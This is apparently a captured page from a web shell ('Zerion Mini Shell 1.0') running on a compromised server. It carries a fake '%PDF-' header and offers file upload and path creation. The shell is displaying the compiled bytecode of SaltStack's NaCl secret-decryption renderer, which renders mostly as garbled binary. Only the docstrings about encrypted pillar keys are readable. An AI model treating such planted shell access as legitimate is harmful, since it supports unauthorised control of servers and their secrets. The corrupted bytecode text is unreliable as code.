%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /proc/self/root/proc/3522530/root/usr/lib/python2.7/site-packages/salt/renderers/
Upload File :
Create Path :
Current File : //proc/self/root/proc/3522530/root/usr/lib/python2.7/site-packages/salt/renderers/nacl.pyo

�
���^c@@s�dZddlmZmZmZddlZddlZddlZddl	Zddl
jjZej
e�ZdZd�Zdddd�ZdS(	u�
Renderer that will decrypt NACL ciphers

Any key in the SLS file can be an NACL cipher, and this renderer will decrypt it
before passing it off to Salt. This allows you to safely store secrets in
source control, in such a way that only your Salt master can decrypt them and
distribute them only to the minions that need them.

The typical use-case would be to use ciphers in your pillar data, and keep a
secret key on your master. You can put the public key in source control so that
developers can add new secrets quickly and easily.

This renderer requires the libsodium library binary and libnacl >= 1.5.1
python package (support for sealed boxes came in 1.5.1 version).


Setup
-----

To set things up, first generate a keypair. On the master, run the following:

.. code-block:: bash

    # salt-call --local nacl.keygen sk_file=/root/.nacl


Using encrypted pillar
---------------------

To encrypt secrets, copy the public key to your local machine and run:

.. code-block:: bash

    $ salt-call --local nacl.enc datatoenc pk_file=/root/.nacl.pub


To apply the renderer on a file-by-file basis add the following line to the
top of any pillar with nacl encrypted data in it:

.. code-block:: yaml

    #!yaml|nacl

Now with your renderer configured, you can include your ciphers in your pillar
data like so:

.. code-block:: yaml

    #!yaml|nacl

    a-secret: "NACL[MRN3cc+fmdxyQbz6WMF+jq1hKdU5X5BBI7OjK+atvHo1ll+w1gZ7XyWtZVfq9gK9rQaMfkDxmidJKwE0Mw==]"
i(tabsolute_importtprint_functiontunicode_literalsNu^NACL\[(.*)\]$cK@stjjj|�r(t|j�|�St|tj�rt	j
t|�dk	rxt
dt	j
t|�jd�|�S|Sn�t|t�r�x0tj|�D]\}}t||�||<q�W|St|t�rx-t|�D]\}}t||�||<q�W|S|SdS(u�
    Recursively try to decrypt any object. If the object is a six.string_types
    (string or unicode), and it contains a valid NACLENC pretext, decrypt it,
    otherwise keep going until a string is found.
    unacl.deciN(tsalttutilststringiotis_readablet_decrypt_objecttgetvaluet
isinstancetsixtstring_typestretsearcht
NACL_REGEXtNonet__salt__tgrouptdictt	iteritemstlistt	enumerate(tobjtkwargstkeytvalue((s7/usr/lib/python2.7/site-packages/salt/renderers/nacl.pyRGs&ubaseucK@s
t||�S(ua
    Decrypt the data to be rendered using the given nacl key or the one given
    in config
    (R(t	nacl_datatsaltenvtslstarglineR((s7/usr/lib/python2.7/site-packages/salt/renderers/nacl.pytrender`s(t__doc__t
__future__RRRRtloggingtsalt.utils.stringioRt
salt.syspathstsalt.ext.sixtextR
t	getLoggert__name__tlogRRR(((s7/usr/lib/python2.7/site-packages/salt/renderers/nacl.pyt<module>5s	

Zerion Mini Shell 1.0